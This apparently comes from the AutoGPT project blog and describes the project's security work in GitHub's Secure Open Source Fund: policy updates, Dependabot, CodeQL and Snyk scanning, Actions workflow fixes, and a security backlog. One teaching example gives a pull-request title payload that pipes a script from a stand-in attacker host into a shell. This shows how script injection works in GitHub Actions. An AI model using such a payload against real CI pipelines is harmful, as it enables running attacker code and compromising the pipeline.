AutoGPT Joins GitHub’s Secure Open Source Fund (SOSF) to Advance AI Security

Aug 28, 2025

Otto

Chief Automation Octopus

GitHub Secure Open Source Fund

AutoGPT was invited to participate in the inaugural session of GitHub’s Secure Open Source Fund (SOSF) program. Trusted team members Reinier (@pwuts), Bently (@bentlybro), and Nick (@ntindle) attended the sessions in March 2025, alongside more than 20 other projects, many of which you know and we use, like shadcn/ui, Node, Next.js, and Jupyter. Together we attended workshops and fireside chats hosted by the GitHub Security Lab and some lovely guest speakers. The SOSF program marks the beginning of another initiative in which GitHub pushes security forward in the code we all use and love. You can read more about it here.

What AutoGPT Did to Make AI Agents Safer

#1 Improved Our Security Policies

What We Found

While robust in most respects, AutoGPT’s security policies were not prepared to handle the most serious classes of reports from security researchers.

What We Did

We revamped AutoGPT’s security policy and remediation plan, and aggressively upskilled the team in handling security incidents.

#2 Automated Vulnerability Patching 

What We Found

Manually patching security vulnerabilities is time-consuming and not scalable as AutoGPT grows.

What We Did

We set up automated tooling, including Dependabot, CodeQL, and Snyk, to regularly scan our codebase and container builds, keeping dependencies up to date and catching known vulnerabilities early.
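As an illustrative sketch (not AutoGPT’s actual configuration), a minimal `.github/dependabot.yml` covering code, container, and workflow dependencies might look like:

```yaml
# .github/dependabot.yml — weekly update checks across three ecosystems
version: 2
updates:
  # Application dependencies (swap "npm" for your ecosystem, e.g. "pip")
  - package-ecosystem: "npm"
    directory: "/"
    schedule:
      interval: "weekly"

  # Base images referenced in Dockerfiles
  - package-ecosystem: "docker"
    directory: "/"
    schedule:
      interval: "weekly"

  # The actions your CI workflows depend on
  - package-ecosystem: "github-actions"
    directory: "/"
    schedule:
      interval: "weekly"
```

With this in place, Dependabot opens pull requests when newer (or patched) versions of a dependency become available, turning vulnerability patching into a review step rather than a manual hunt.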

#3 Resolved Issues with GitHub Action Workflows

What We Found

Some of our GitHub Actions workflows contained flaws that could have allowed an attacker to compromise our CI.

What We Did

With the help of the GitHub Security Lab, we resolved the issues in our Actions workflows.
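The post doesn’t detail the specific flaws, but a common class the GitHub Security Lab warns maintainers about is script injection from untrusted input interpolated directly into a `run:` step. A hypothetical before/after:

```yaml
# VULNERABLE: a PR titled `"; curl https://evil.example | sh` would execute
# attacker-controlled commands, because the title is spliced into the script
- name: Greet (unsafe)
  run: echo "New PR: ${{ github.event.pull_request.title }}"

# SAFER: pass untrusted input through an environment variable so the shell
# treats it as data rather than as part of the script itself
- name: Greet (safe)
  env:
    PR_TITLE: ${{ github.event.pull_request.title }}
  run: echo "New PR: $PR_TITLE"
```

The same pattern applies to branch names, issue bodies, commit messages, and any other field a third party can control.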

#4 Created a Security Backlog

What We Found

The highest-performing security practices are proactive, not reactive.

What We Did

We created a security backlog and seeded it with 20+ items to work through over time, such as:

1. Fuzzing GravitasML + joining OSS Fuzz

2. Setting up the OpenSSF Scorecard to continuously check GravitasML’s security posture

3. Setting up zizmor for static analysis of our GitHub Actions

4. Pinning all dependencies

5. Building out Software Bill of Materials (SBOM) documents for all the tools we use and make
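To illustrate item 4 on the list above: pinning a GitHub Action to a full commit SHA, rather than a mutable tag, guarantees exactly which revision your workflow runs (the SHA below is shown for illustration; verify against the action’s repository before pinning):

```yaml
# Mutable tag: whoever controls the tag controls the code your workflow runs
- uses: actions/checkout@v4

# Pinned: a full commit SHA resolves to exactly one immutable revision;
# the trailing comment records which release it corresponds to
- uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2
```

Tools like Dependabot can still bump SHA-pinned actions, so pinning doesn’t mean freezing; it means every update is an explicit, reviewable change.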

Creating Community within the SOSF

As part of the Secure Open Source Fund (SOSF), the AutoGPT team didn’t just attend; we meaningfully contributed. By joining a peer group of maintainers deeply committed to security-first development, we helped create a feedback loop where challenges and lessons are exchanged weekly. This collaborative environment enabled AutoGPT to participate in shaping best practices for bringing fast-growing repositories into compliance with modern security expectations. Besides the security-related benefits, the SOSF program helped AutoGPT build lasting friendships and a robust support network, which some might argue were the most important parts of the project!

Why Security Must Be at the Core of AI

Security is not an add-on feature; it’s a prerequisite for safe, trustworthy innovation, especially in the age of autonomous AI agents and hyper-connected systems. As AI tools like AutoGPT become more deeply integrated into workflows across the internet, any vulnerability can quickly be exploited at a massive scale. That’s why proactive security investments, from policy to automation to community collaboration, are critical for preserving the integrity of the open web. A secure AI ecosystem protects users, accelerates development, and ensures that the future of computing remains safe, transparent, and beneficial to us all.

Thank-Yous

We have so many thanks to give to so many people who helped run the program, from the boots-on-the-ground leaders like Gregg and Kevin, to the program ecosystem and funding partners. The GitHub Security Lab teams were instrumental in teaching us all some very new and exciting topics and answering all of Nick's (@ntindle) many questions.

If you’re a maintainer, the GitHub Security Lab team is a fantastic resource. There’s also the GitHub maintainers community at https://maintainers.github.com to get you going in the right direction.

Partners

Funding Partners: Alfred P. Sloan Foundation, American Express, Chainguard, Datadog, Herodevs, Kraken, Mayfield, Microsoft, Shopify, Stripe, Superbloom, Vercel, Zerodha, 1Password

Ecosystem Partners: Ecosyste.ms, CURIOSS, Digital Data Design Institute Lab for Innovation Science, Digital Infrastructure Insights Fund, Microsoft for Startups, Mozilla, OpenForum Europe, Open Source Collective, OpenUK, Open Technology Fund, OpenSSF, Open Source Initiative, OpenJS Foundation, University of California, Santa Cruz OSPO, Sovereign Tech Agency, SustainOSS
